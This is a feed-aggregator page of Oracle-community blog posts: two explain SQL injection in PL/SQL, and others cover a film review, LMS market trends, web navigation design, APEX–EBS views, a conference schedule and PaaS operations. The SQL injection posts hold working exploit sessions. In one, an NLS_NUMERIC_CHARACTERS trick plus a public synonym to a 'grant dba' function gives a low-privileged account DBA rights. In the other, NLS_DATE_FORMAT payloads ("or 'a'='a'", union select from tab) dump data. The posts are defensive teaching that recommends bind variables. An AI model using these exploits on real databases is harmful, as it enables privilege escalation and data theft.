Feed aggregator
All about Security - SQL Injection redux
One of the comments on that post was by David Litchfield, he wrote:
Hey Tom,Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploit DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf
I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well. It is just a variation on a theme after all). In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers. That is something I hadn't considered before. NLS settings for numbers are different than for dates. With a date, I can set the format string to have any string of characters I want. With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.
But - you can. Just not as flexibly. But the end result can be as disastrous.
One of the follow on comments to this posting by David was:
the problem David mentions in http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers only arises since NUM_PROC is owned by SYS,as far as I can see, correct ? So, it's not really a problem since nobody ever does something as SYS, correct.
In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw". But - it doesn't. All it requires is an account with these privileges:
- Create session
- Create procedure
- Create public synonym <<<=== these guys are evil! Should be avoided
Here is how to exploit the flaw. First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS. Then you'll understand how:
a%ORA11GR2> select .1 from dual;
.1---------- P1
works. Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this. I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:
ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number ) 2 as 3 l_query long; 4 l_cursor sys_refcursor; 5 l_rec all_users%rowtype; 6 begin 7 l_query := ' 8 select * 9 from all_users 10 where user_id = ' || l_num; 11 dbms_output.put_line( l_query ); 12 13 open l_cursor for l_query; 14 15 loop 16 fetch l_cursor into l_rec; 17 exit when l_cursor%notfound; 18 dbms_output.put_line( 'username = ' || l_rec.username ); 19 end loop; 20 close l_cursor; 21 end; 22 /Procedure created.
Then, we'll have our account with the small set of privileges:
ops$tkyte%ORA11GR2> create user a identified by a;User created.
ops$tkyte%ORA11GR2> grant create session, create procedure, create public synonym to a;Grant succeeded.
and we'll allow it to access this procedure - just like in my original SQL Injection article:
ops$tkyte%ORA11GR2> grant execute on do_something to a;Grant succeeded.
Ok, so now we'll log in as A and run the procedure to see what it does:
ops$tkyte%ORA11GR2> connect a/aConnected.a%ORA11GR2> a%ORA11GR2> exec ops$tkyte.do_something( 5 );
select * from all_users where user_id = 5username = SYSTEM
PL/SQL procedure successfully completed.
Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:
a%ORA11GR2> create or replace function foobar return number 2 authid current_user 3 as 4 pragma autonomous_transaction; 5 begin 6 execute immediate 'grant dba to a'; 7 return 5; 8 end; 9 /Function created.
And then set up our public synonym for it and allow others to execute it:
a%ORA11GR2> create public synonym p1 for foobar;Synonym created.
a%ORA11GR2> grant execute on foobar to public;Grant succeeded.
and now for the magic:
a%ORA11GR2> alter session set nls_numeric_characters = 'P ';Session altered.
and viola:
a%ORA11GR2> set role dba;set role dba*ERROR at line 1:ORA-01924: role 'DBA' not granted or does not exist
a%ORA11GR2> exec ops$tkyte.do_something( .1 );
select * from all_users where user_id = P1username = SYSTEM
PL/SQL procedure successfully completed.
a%ORA11GR2> set role dba;
Role set.
I have DBA...
SQL Injection is insidious. SQL Injection is hard to detect. SQL Injection can be avoided - by simply using bind variables. In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited. The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".
It is really hard to protect yourself from something you cannot see.
Updated a little later: Let me also say this:
If you use static sql in plsql - your code in plsql cannot be sql injected, period. It is not possible. The only way to get sql injected in plsql is to use dynamic sql - that is the only time. So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:
a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database
If you do that - no SQL Injection attacks are possible.
Come To The Mountains!
Chronicle…
I thought Chronicle was a cool film. Three kids find some weird object and develop super powers. How will it affect them and how will they choose to use them?
It has the “shot on my camcorder” feel, like Cloverfield, and has a kind of Akira feel to me. While I was watching it I kept expecting someone to say, “With great power comes great responsibility!” 
The effects are pretty cool. At the start they look like they are going to be a bit low budget, but by the end they get pretty impressive.
Nice mix of teen angst, super powers and destruction. Obviously not targeted for 42 year old men, but it hit the mark for me. I guess that says a lot.
Cheers
Tim…
Farewell to the Enterprise LMS, Greetings to the Learning Platform
By Phil Hill
Along with others, I have written several times over the past 12 months here, here, here and here about the significant changes occurring in the educational LMS market. In my opinion, when we look back on market changes, 2011 will stand out as the year when the LMS market passed the point of no return and changed forever. What we are now seeing are some real signs of what the future market will look like, and the actual definition of the market is changing. We are going from an enterprise LMS market to a learning platform market.
What I mean by ‘enterprise LMS’ is the legacy model of the LMS as a smaller, academically-facing version of the ERP. This model was based on monolithic, full-featured software systems that could be hosted on-site or by a managed hosting provider. A ‘learning platform’, by contrast, does not contain all the features in itself and is based on cloud computing – multi-tenant, software as a service (SaaS).
The 2011 EDUCAUSE event captured the zeitgeist of the changes, as it seemed most of the buzz at the conference centered on new LMS solutions and paradigm changes. Instructure made their debut at the conference, Pearson’s OpenClass was announced, Blackboard announced a new move in open content focused on CourseSites, and Cengage demonstrated their MindTap platform. Rather than slowing since EDUCAUSE, we have seen several additional announcements in the past three months.
- CourseKit was released as a free learning platform targeted at faculty adoption.
- Apple’s iTunesU app was announced alongside the iBooks / Author textbook offering, extending iTunesU as an iPad-based learning platform.
- Facebook made a move within its higher education roots, starting a pilot program with Groups for Universities.
In my post from last summer, I characterized the changes we were starting to see, but with all of the recent changes, I think it would be useful to extend the first two trends mentioned.
The question is, what will the LMS market that is emerging from these changes look like? No one can know for sure what will happen over the next 3 – 5 years, but I do think there are some key trends that are worth understanding.
- The market is more competitive, with more options, than it has been for years. Instructure is a real player that has shown that it can win against established LMS vendors with big wins in Utah and at Auburn. LoudCloud has new clients at CEC, Grand Canyon U and an unreported win at a public state university. BrainHoney won at BYU. Pearson LearningStudio has major wins at Arizona State and Columbia online programs. Desire2Learn has roughly doubled in size in the past year. Moodle and Sakai, including through providers such as MoodleRooms and rSmart and Unicon, continue their impressive wins in the market.
- Related to the above, there is a trend towards software as a service (SaaS) models for new LMS solutions. The SaaS model offers some compelling advantages in terms of deployment time and ability to mine and report transactional data that might not be possible with other approaches. SaaS is not a panacea, but this is a growing trend in the LMS market.
The trend towards SaaS could perhaps more accurately be described as the default model now for new offerings. In the LMS market from just short two years ago, the default model was enterprise LMS. The only exception was Pearson’s LearningStudio (the artist formerly known as eCollege.com). Today, every single new offering mentioned above is SaaS-based. Apple’s iTunesU app is a mobile app, but the content is served from a behind-the-scenes SaaS platform.
Perhaps more significantly – there has not been a new enterprise LMS created since around 2004. Yes, each legacy LMS provider has major new releases available, but the one exception you could argue is that Sakai 3 is a new LMS and not just an upgrade from Sakai 2. Other than this exception, every new LMS solution to enter the market in the past two years has been based on a learning platform. I doubt we will see any more enterprise LMS solutions created given the cost-benefits of creating SaaS offerings.
Another trend that is becoming apparent is that many of the new offerings are not attempting to fully replace the legacy LMS, at least all at once. Rather than competing with all of the possible features that are typical in enterprise LMS solutions, the new platforms appear to target specific institutional problems and offer only the features needed. Perhaps inspired by Apple’s success in offering elegant solutions at the expense of offering all the features, or perhaps inspired by Clayton Christensen’s disruptive innovation model, the new learning platform providers are perfectly willing to say ‘no – we just don’t offer this feature or that feature’.
My colleague Jim Ritchey has written about the changes that SaaS models are starting to have in the higher education ERP market, put in context of the Datatel+SGHE merger. His key point:
Therefore the challenge for the vendors is how to get the ERP, with its slow development and implementation cycles, to provide the solutions to the new needs of the institution.
In the LMS market, the new answer to this question – how to adapt and respond to new institutional needs – appears to be based on learning platforms.
Possibly related posts:
- What Platform Do You Use for (Pure) Distance Learning? I’m doing a little research and could use your help....
- Oracle's New Academic Enterprise White Paper The product group I’m in at Oracle (Academic Enterprise Solutions,...
- Zimbra: What a Mashup-Enabled Enterprise App Looks Like Phew. Enough with the Apple stuff. I actually still have...
- Enterprise vs. Internet World Views in Educational Tool Design There’s an excellent (albeit necessarily technical) conversation about implementing OKI...
- Sakai Foundation Board Platform: Vision for the Technology I am honored to announce that I have been nominated...
Farewell to the Enterprise LMS, Greetings to the Learning Platform by %%AUTHORINK%% on e-Literate
WEM Best Practices: Page Navigation
Today’s guest post on WEM Best Practices comes from a member of our WebCenter Evangelist team, Noël Jaffré, a Principal Technologist based in France.
12.00 Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Users interact with Web pages by clicking on links and submitting forms. However, behind this simplified navigation road on the web page there are four major types of page flow navigation dictating how to interact with the web site from a reader, visitor or prospect perspective. Why is the experience of reading a web site like oracle.com, OMV.at radically different than a site like gore.com, bestbuy.com, amazon.com, booking.com, or news.com.au ? Let’s try to identify the objectives of the webmaster and the benefits for the visitors.
Page
Hierarchy Navigation
OMV and Oracle web site provides a top navigation web site, on the home page a few boxes to access categorized information, and on the next navigation level a vertical menu to drive down on three more levels in the three. So -- all of the information is accessible using the navigation tree. On some content in top right boxes there are cross links to access one level of related content. Basically the web site is built from a tree hierarchy, and we assemble content at every level.
Contributors assumed the visitors are minded to access the content in one unique way. And this way is their way.
Visitors have to follow a principle of navigating, designed by the web site manager. The navigation through the content is limited as there is no or poor relation between content.
Static web sites are by nature designed using page hierarchy navigation. Webmasters, when designing desktop and dashboard web sites, whether they are personalized or not by visitors, use this approach to assemble content and applications through a single web page hierarchy. Implemented within Portal technologies, it’s particularly appreciated by application developers, since there is a clear separation between the portal navigation and application page flows. It lets developers designing application logic and presentation independently from the organization of the targeted website.
This approach is great to create a desktop environment to assemble components or to build a dashboard to have a global vision on activities, tasks or jobs.
The user engagement is as light as opening and closing a drawer to access information.
Search, Faceted or Dynamic Navigation
Google search is the best example of full text search. Here the navigation is created by the search engine. It returns a set of items, and the business users just follow the suggestions.
With faceted search like Gore.com, bestbuy.com, walmart.com sites, when visitor requests to view all products from the product page, he is requested to select a category to filter the content. On selection, the visitor is requested to click on subcategories to again reduce the list of product. The digging process ends when there are no more products available for selected categories and sub-categories.
Here content or product are arranged and organized in a tree created dynamically through the metadata data structure. There are multiple root trees associated with the metadata. Visitors dig down in the catalog using a specific root. Each business user can access the same content through multiple categories, and therefore follows their own path for navigation. A consumer is accessing the product or content using their own thoughts or knowledge about the content or product. Contributors have just to assign the right meta-data on the content and it appears automatically in multiple hierarchies.
The user engagement is relatively limited when using a full text search. It’s a very good approach to initiate a journey. Faceted search is unique to engage business user to navigate and discover product within a catalog.
Business Navigation
Barclays, Santander, bestbuy.com, walmart.com and most of the banking or commerce web sites provide a set of functions to provide online banking, purchase products, customers services,... These functions are often named business transaction or online transactions typically for data entry and retrieval. It provides a set of screens to track a process flow. The process flow is predefined through a business process in order to achieve a complete task or action by the business user. The goal is to give a high level quality of services within a controlled process for the business user.
For banking it consist of a financial transaction such as an account to account transfer, paying a bill, wire transfer, applying for a loan, new account,...
For eCommerce it refers to the process of placing a product in the shopping cart, and managing all the transaction flow to convert a visitor to become a buyer. A buying funnel is a term to describe the entire buying process for a consumer. It is a description that involves all the steps in the purchasing process, and also goes by the names of buying cycle, buyer decision cycle, and sales cycle.
The navigation here is completely driven by a workflow, predefined through the analysis of a business process. So the visitor or business user has to follow the process in order to accomplish the task.
Following this process is a need for the business user, but there is nothing fancy to accomplish this task. It has to be simple, safe, secure and very short.
The user engagement and motivation is the pleasurable emotion before the action and the perspective of the results after the transaction. The transaction and the business application has just to be done fast. It’s a “mal nécéssaire” !
Social Navigation
Amazon and booking are web sites that have extended the navigation through a social model. It refers to a user navigation guided by the activities or suggestions from the other in the same space. Let us take a situation where someone is lost in the desert. He tends to see if there were past activities, footprints from others, to help find his own way. The one is tempted to follow others having done the same activity or navigation previously.
Recommendation systems use information from purchase histories to suggest product because other buyers who already bought this item also bought this other list of products. E-Commerce engines are using feedback and ratings to highlight hotels or services based on the experiences of others. The navigation is driven by others who went on the site before.
The web experience and engagement is based on the trust and certainty.
Content Navigation
news.com.au, roularta.be, all the media and press web sites
are content driven. There is a set of lists of content on the front page
organized by theme, such as sport, politics, world,... information depending on
the news of the day. The main page also 
drives the visitor directly to the main
themes through a menu bar directly accessible from the top menu bar. A click on
one of the pieces of content switch the visitor from a page theme view to a
content item view, such as an article, a video, a product or whatever content
type is available on the web site. From there the visitor gets the content item
presented in the main section of the page. All the regional sides of the page
are used to associate the related content item associated with the content
currently consumed by the visitor. Related items are content talking about the
same subjects (a set of articles), the same content presented using other media
types (pictures, image slide show, video, audio player, flash,...). When
reading the new content item, the user retrieves the same presentation of the
content item in main section. The content is presented with a new layout for a
different media type, but still with the same concept of related content.
Readers are looking for the information of the day directly accessible from the home page or specific content linked through a thematic accessible by a click on the main menu bar (politics, sports,...). The concept of related content gives the readers an infinite possibility to dig into the content data warehouse, following their own feeling or humor.
The content navigation model is based on a view of the content type. There is one view per content type. A navigation between two articles keeps the same view, but changes the context of the view, and therefore all the related contents.
This content view model is extendable to embed contextual navigation for any object type; content, product, application or conversation.... So a view of an article already suggests related content, products, services and applications. By including the profile of the user, we personalize the related objects. Geo-localizing the visitor will help suggest local restaurants or services. The site is defined as a succession of contextual views based on object types. It’s simple to design, implement, extend and maintain.
Navigation or path to access content on the site is an individual experience, unique, and always different for each connection. Web experience and engagement are a journey!
Conclusion
As a conclusion, a good engaging web site will use a combination of multiple flow navigation. In a competitive market place understanding customer’s needs become an important factor. As a result, companies have moved from a product-centric to a customer centric position or customer oriented marketing. It’s more difficult to make their physical products differ from their competitors than before. It’s not only about business transactions that involve ordering and payment. One of the most important ways to gain superior profitability is the delivery of electronic communications, information exchange about the products and delivery, and last but not least, superior customer service.
In such new modern web sites, search, parametric search and content navigation are used to attract, identify, anticipate and satisfy customer requirements. Funnel navigation takes a visitor from the previous internet advertising, a search system, or navigating e-commerce web sites to convert him as a customer and finalize the transaction in a closed path.
E-Business Suite and APEX integration using Views
Integrating APEX and EBS by using views is one of the easiest solutions (at first sight!).This is the first scenario, where I have an APEX application and I want to integrate with data sitting in EBS.
Pre-requisites:
- APEX is installed in the same database as EBS (see previous post).
- My APEX application (actually Workspace) is linked to my own (non-EBS) Oracle schema.
- Identify where the data is in EBS
If you are not familiar with the data model of EBS, it can be hard to find the right information. A good starting point would be the APPS schema, because that has access to the complete Oracle E-Business Suite data model. You can compare it with the SYSTEM schema, which has access to the entire database.
This pictures shows an overview of the APPS schema and base product schemas.
You can read more about the APPS schema in the EBS documentation.
In my example I wanted to find the people that are in my organisation (HR). I started to look for views that would give me that information. My first query was like this:
select object_name
from user_objects
where object_name like '%PEOPLE%'
and object_type = 'VIEW'
order by 1
That query returned 82 rows in my environment. In the results I saw e.g. ADS_PEOPLE_V, HRBG_PEOPLE, PER_ALL_PEOPLE, PER_PEOPLE, PER_PEOPLE_F etc.
I started to look at the definitions of those, but if you are not familiar with EBS it's hard to know which one is the one you need. So my recommendation would definitely be; when you are not that familiar with EBS, talk with somebody who knows more about it. For me that is the case, I only started to look into EBS and actually do something with it, a few weeks ago.
When I talked to somebody more experienced in EBS, he told me I probably wanted to look at PER_ALL_PEOPLE_F. Hmm, that wasn't in the result set of the above query. After investigating a bit more PER_ALL_PEOPLE_F is a synonym for HR.PER_ALL_PEOPLE_F.
I wanted to understand the naming convention in EBS a bit better e.g. for the PER%PEOPLE% objects.
Below I created a table how I interpret the EBS objects:
View /Synonym (^)count(*)count(distinct person_id)Interpretationper_all_people_f (^)3229518518Synonym to real HR tableper_all_people00Needs EBS session (record inFND_SESSIONS) so it knows what you can seeper_all_people_d3229518518All records but showstranslated text if user settings are appliedper_people00Needs EBS session, showseffective records based on user's dateper_people_f3229518518EBS security implemented, youonly see records you are allowed to see per_people_v00Needs EBS Session, includes alot of display text and is language dependendper_people_x1851818518EBS security implemented (sameas per_people_f), but limits to only the effective records
(WHERE TRUNC(SYSDATE) BETWEEN EFFECTIVE_START_DATE ANDEFFECTIVE_END_DATE)
So to me PER_PEOPLE_X looks like a good candidate to use in my APEX application. If I'm not logged into the app as an E-Business user I still see all records that are effective at the time I run the query. - Create a view on top of the EBS views and use some naming conventions so it's easy to recognise which objects you created and are not native EBS ones.
create view apex_per_people_vw as select * from per_people_x - Grant access on that view to the schema that is linked to your APEX workspace and application
grant select on apex_per_people_vw to apex_ebs - Create a view in your own schema that selects everything from the view in the apps schema.
We do that so that the views are a one-on-one mapping between schema's, but they show up in the APEX wizards.
create view apex_per_people_vw as select * from apps.apex_per_people_vw - Create an Interactive Report on top of the view
Previous related posts:
- E-Business Suite and APEX integration (overview)
- E-Business Suite and APEX installation
- APEX and E-Business Suite integration (OBUG event)
RMOUG
Just a quick reminder that the Rocky Mountain Oracle User Group Traning days are just eleven days away. It’s one of the best Oracle events I’ve attended, and I’ll be there again this year. There are plenty of good speakers and interesting presentations on a wide range of topics – and if you’re wandering around between sessions with nothing to do, I’ll be around too and will be happy to say hello and have a chat.
Here’s the list of things I’ve pencilled in on my timetable so far. (Some of the gaps are there because I’m doing three presentations myself, some are there because I haven’t decided what to see yet.)
Wednesday 9:15 Database I/O Performance: Measuring and Planning – Alex Gorbachev, Pythian 10:45 Parallel Execution in RAC – Riyaj Shamsudeen, OraInternals 16:00 Making Sense of Big Data – Gwen Shapira, Pythian Thursday 8:30 Developing and Deploying Extremely Large Databases with Oracle 11gR2 – Daniel Morgan, Morgan’s Library 9:45 Mining the AWR Repository for Capacity Planning, Visualization, and other Real World Stuff – Karl Arao, Enkitec 13:30 Using Oracle Execution Plans for Performance Gains – Janis Griffin, Confio SoftwareIf nothing else catches your eye, don’t miss out the opportunity to hear Maria Colgan talking about the optimizer. She’s doing three presenations (and only one of them coincides with one of mine) and they’re all worth hearing.
Log Buffer #257, A Carnival of the Vanities for DBAs
Come for the PaaS Functional Model, stay for the Cloud Operational Model
The Functional Model of PaaS is nice, but the Operational Model matters more.
Let’s first define these terms.
The Functional Model is what the platform does for you. For example, in the case of AWS S3, it means storing objects and making them accessible via HTTP.
The Operational Model is how you consume the platform service. How you request it, how you manage it, how much it costs, basically the total sum of the responsibility you have to accept if you use the features in the Functional Model. In the case of S3, the Operational Model is made of an API/UI to manage it, a bill that comes every month, and a support channel which depends on the contract you bought.
The Operational Model is where the S (“service”) in “PaaS” takes over from the P (“platform”). The Operational Model is not always as glamorous as new runtime features. But it’s what makes Cloud Cloud. If a provider doesn’t offer the specific platform feature your application developers desire, you can work around it. Either by using a slightly-less optimal approach or by building the feature yourself on top of lower-level building blocks (as Netflix did with Cassandra on EC2 before DynamoDB was an option). But if your provider doesn’t offer an Operational Model that supports your processes and business requirements, then you’re getting a hipster’s app server, not a real PaaS. It doesn’t matter how easy it was to put together a proof-of-concept on top of that PaaS if using it in production is playing Russian roulette with your business.
If the Cloud Operational Model is so important, what defines it and what makes a good Operational Model? In short, the Operational Model must be able to integrate with the consumer’s key processes: the business processes, the development processes, the IT processes, the customer support processes, the compliance processes, etc.
To make things more concrete, here are some of the key aspects of the Operational Model.
Deployment / configuration / management
I won’t spend much time on this one, as it’s the most understood aspect. Most Clouds offer both a UI and an API to let you provision and control the artifacts (e.g. VMs, application containers, etc) via which you access the PaaS functional interface. But, while necessary, this API is only a piece of a complete operational interface.
Support
What happens when things go wrong? What support channels do you have access to? Every Cloud provider will show you a list of support options, but what’s really behind these options? And do they have the capability (technical and logistical) to handle all your issues? Do they have deep expertise in all the software components that make up their infrastructure (especially in PaaS) from top to bottom? Do they run their own datacenter or do they themselves rely on a customer support channel for any issue at that level?
SLAs
I personally think discussions around SLAs are overblown (it seems like people try to reduce the entire Cloud Operational Model to a provisioning API plus an SLA, which is comically simplistic). But SLAs are indeed part of the Operational Model.
Infrastructure change management
It’s very nice how, in a PaaS setting, the Cloud provider takes care of all change management tasks (including patching) for the infrastructure. But the fact that your Cloud provider and you agree on this doesn’t neutralize Murphy’s law any more than me wearing Michael Jordan sneakers neutralizes the law of gravity when I (try to) dunk.
In other words, if a patch or update is worth testing in a staging environment if you were to apply it on-premise, what makes you think that it’s less likely to cause a problem if it’s the Cloud provider who rolls it out? Sure, in most cases it will work just fine and you can sing the praise of “NoOps”. Until the day when things go wrong, your users are affected and you’re taken completely off-guard. Good luck debugging that problem, when you don’t even know that an infrastructure change is being rolled out and when it might not even have been rolled out uniformly across all instances of your application.
How is that handled in your provider’s Operational Model? Do you have visibility into the change schedule? Do you have the option to test your application on the new infrastructure or to at least influence in any way how and when the change gets rolled out to your instances?
Note: I’ve covered this in more details before and so has Chris Hoff.
Diagnostic
Developers have assembled a panoply of diagnostic tools (memory/thread analysis, BTM, user experience, logging, tracing…) for the on-premise model. Many of these won’t work in PaaS settings because they require a console on the local machine, or an agent, or a specific port open, or a specific feature enabled in the runtime. But the need doesn’t go away. How does your PaaS Operational Model support that process?
Customer support
You’re a customer of your Cloud, but you have customers of your own and you have to support them. Do you have the tools to react to their issues involving your Cloud-deployed application? Can you link their service requests with the related actions and data exposed via your Cloud’s operational interface?
Security / compliance
Security is part of what a Cloud provider has to worry about. The problem is, it’s a very relative concept. The issue is not what security the Cloud provider needs, it’s what security its customers need. They have requirements. They have mandates. They have regulations and audits. In short, they have their own security processes. The key question, from their perspective, is not whether the provider’s security is “good”, but whether it accommodates their own security process. Which is why security is not a “trust us” black box (I don’t think anyone has coined “NoSec” yet, but it can’t be far behind “NoOps”) but an integral part of the Cloud Operational Model.
Business management
The oft-repeated mantra is that Cloud replaces capital expenses (CapExp) with operational expenses (OpEx). There’s a lot more to it than that, but it surely contributes a lot to OpEx and that needs to be managed. How does the Cloud Operational Model support this? Are buyer-side roles clearly identified (who can create an account, who can deploy a service instance, who can manage a deployed instance, etc) and do they map well to the organizational structure of the consumer organization? Can charges be segmented and attributed to various cost centers? Can quotas be set? Can consumption/cost projections be run?
We all (at least those of us who aren’t accountants) love a great story about how some employee used a credit card to get from the Cloud something that the normal corporate process would not allow (or at too high a cost). These are fun for a while, but it’s not sustainable. This doesn’t mean organizations will not be able to take advantage of the flexibility of Cloud, but they will only be able to do it if the Cloud Operational Model provides the needed support to meet the requirements of internal control processes.
Conclusion
Some of the ways in which the Cloud Operational Model materializes can be unexpected. They can seem old-fashioned. Let’s take Amazon Web Services (AWS) as an example. When they started, ownership of AWS resources was tied to an individual user’s Amazon account. That’s a big Operational Model no-no. They’ve moved past that point. As an illustration of how the Operational Model materializes, here are some of the features that are part of Amazon’s:
- You can Fedex a drive and have Amazon load the data to S3.
- You can optimize your costs for flexible workloads via spot instances.
- The monitoring console (and API) will let you know ahead of time (when possible) which instances need to be rebooted and which will need to be terminated because they run on a soon-to-be-decommissioned server. Now you could argue that it’s a limitation of the AWS platform (lack of live migration) but that’s not the point here. Limitations exists and the role of the Operational Model is to provide the tools to handle them in an acceptable way.
- Amazon has a program to put customers in touch with qualified System Integrators.
- You can use your Amazon support channel for questions related to some 3rd party software (though I don’t know what the depth of that support is).
- To support your security and compliance requirements, AWS support multi-factor authentication and has achieved some certifications and accreditations.
- Instance status checks can help streamline your diagnostic flows.
These Operational Model features don’t generate nearly as much discussion as new Functional Model features (“oh, look, a NoSQL AWS service!”) . That’s OK. The Operational Model doesn’t seek the limelight.
Business applications are involved, in some form, in almost every activity taking place in a company. Those activities take many different forms, from a developer debugging an application to an executive examining operational expenses. The PaaS Operational Model must meet their needs.
All about Security - SQL Injection
We also received a few questions, well, actually - a lot of questions. I'm going to try to tackle them here bit by bit. I'm going to start with my favorite topic - questions centered around SQL Injection. I'll center on the core concepts around SQL Injection in this article and then do a followup article regarding the Oracle Database Firewall - a tool useful for detecting and blocking SQL Injection attacks.
During the presentation - I talked about how insidious SQL Injection is - and how hard it can be to detect. In fact, I've written about this before, in this article. The interesting thing about that article on injecting is the very last part of it, the section on "selective system grants". If you read that small section you'll see a comment "Note: Revised contentto prevent SQL injection for this procedure submitted by Roy Jorgensen.". What that means is - the original article I submitted had a SQL Injection bug in it - right after I just spent pages going over SQL Injection! That wasn't too embarrassing was it (it was). But it does point out how easy it is for a SQL Injection bug to sneak into code - even when the coder knows full well what SQL Injection is and how it happens!
Anyway, during the web seminar I talked about a slide I use - with a full stored procedure on it - that contains a SQL Injection bug. I ask the audience, usually full of developers and DBAs to tell me how the code can be SQL Injected.. I tell them right out - this code can be injected and if I were to put it in my schema and grant you execute on it - you could use this to read pretty much any table I own.
I usually hear crickets at this point in time, no hands, no volunteers. Here is the slide:
Note that the input to this procedure is a binary Oracle date - it is fixed length, 7 bytes of data - the century, year, month, day, hour, minute and second. The input is not a string, the input cannot contain things like "or 1=1" - typical SQL Injection attack strings. It can only contain an Oracle date. So - the question is - how can I 'trick' this stored procedure into showing me anything I want to see in the schema that owns the procedure (thus bypassing any and all security the application tier might have put in place - there are no restrictions on what I can and cannot see now).
Before we get there - let's talk about the bit of code that will be problematic - that is line 10. As noted there is a double implicit conversion going on there. That line of code is really:
Where created = to_date( to_char( p_date ) );
There is an implicit to_char on the date field in order to concatenate it to the query string. Then, at runtime there is an implicit to_date on the string we concatenated in so we can compare it to a date. This is a very common thing I see in code all of the time (implicit conversions) - but it is pure evil. Not only will we discover it is the cause of a SQL Injection issue - but here it is a logic bomb as well.
First of all - by default - that to_date( to_char() ) conversion will have a side effect of effectively truncating the time component from the date field. That is evil. If you wanted to truncate the time off - please use TRUNC() on the date - it is much faster, more efficient, and expresses clearly that you intend to truncate the time component. To_date(to_char()) does none of that. Secondly - the conversion by default will also lose the century. If you were trying to look for things created during the war of 1812 - you would lose, you cannot search for 1812 - it would become 2012 (well, right now as I write this it would be 2012 - in 38 years it will become 2112 and you won't be able to search for 2012 anymore...).
Also consider that I said "by default". By default the NLS_DATE_FORMAT is DD-MON-RR (currrently, it has been different in the past!). What happens to this code when someone decides to change it? Your application might well start querying up entirely different data!
So, the implicit conversion by itself is bad - but the real issue is the SQL Injection flaw. If you just run this procedure, by default - it certainly looks OK:
ops$tkyte%ORA11GR2> exec inj( sysdate )
select * from all_users where created = '02-FEB-12'
PL/SQL procedure successfully completed.
that looks OK - seems pretty safe - until, until someone who has read the documentation comes along. They might run your code like this:
ops$tkyte%ORA11GR2> alter session set 2 nls_date_format = 'dd-mon-yyyy"'' or ''a'' = ''a"';
Session altered.ops$tkyte%ORA11GR2> exec inj( sysdate )
select * from all_users where created = '02-feb-2012' or 'a' = 'a'A.....EBRAPP.....EBRTBLS.....UTIL.....USER2.....
PL/SQL procedure successfully completed.
Now that is surprising, you might not even know you could do that in an NLS_DATE_FORMAT. It is really hard to protect against something you don't even know you can do - isn't it? I've had people look at that example and scoff at it - saying "so what, they were allowed to see that table". Ok, take it a step further, I'd like to know what tables you own - so I can start querying them. I'll just do this:
ops$tkyte%ORA11GR2> alter session set 2 nls_date_format = '"''union select tname,0,null from tab--"';Session altered.
ops$tkyte%ORA11GR2> exec inj( null )
Select * from all_users where created = ''union select tname,0,null from tab--'
....
Now you can see where this is going... I find one SQL Injection bug in one procedure and I've unlocked the entire schema.
So, the question now comes up - how do I protect myself from this? What can I do to ensure I'm not subject to SQL Injection in this code?
There are two ways - the hard way and the easy way.
The hard way involves writing code to validate everything and having serious code reviews of any code that uses string concatenation to build their SQL statements - any code that takes a parameter as input and concatenates it to a SQL query must be read and reviewed by many people - many people who will be super critical of the code. In this case, the resulting code would have to be:
where created = to_date( ''' || to_char(p_date,'yyyymmddhh24miss') ||''', ''yyyymmddhh24miss'')';
You need to have a coding standard that says:
- You shall never use implicit conversions ever, as in never.
- You shall always use an explicit date mask with dates, as in every single time, you will not rely on defaults (because defaults can inject you and because defaults can radically modify your logic unintentionally!)
The easy way however is the way to go. The easy way is - just use bind variables! If you use bind variables, you cannot be SQL Injected - this is true for PL/SQL, for Java, for any and all languages. If you use bind variables you cannot be SQL Injected - period. It is that simple, really and truly. If the code was:
7 l_query := ' 8 select * 9 from all_users 10 where created = :x'; 11 open c for l_query USING P_DATE;there is no way the end user can trick that SQL query into becoming anything other than what it is - in fact, for this example, the code should have been:
as cursor c is select * from all_users where created = p_date;begin open c; ...
and nothing more - it shouldn't have even been using dynamic SQL. In Java/C#/C++/etc - you would be using dynamic SQL and you should be using bind variables. So, that answered all of these questions I received:
• where can I find an illustration of SQL injection?• can u share the sql injection demo code• Can you share that SQL injection slide?• Can you show a code example of the SQL injection bug that nobody noticed during your presentations?• Can you show us or point us to the site of the example of SQL injection bug?• Is SQL injection all about binding, or is there more?
Another question was:
• should application layer deal with the SQL injection attacks prevention as that layer understands what the proper data access patterns look like rather then database?
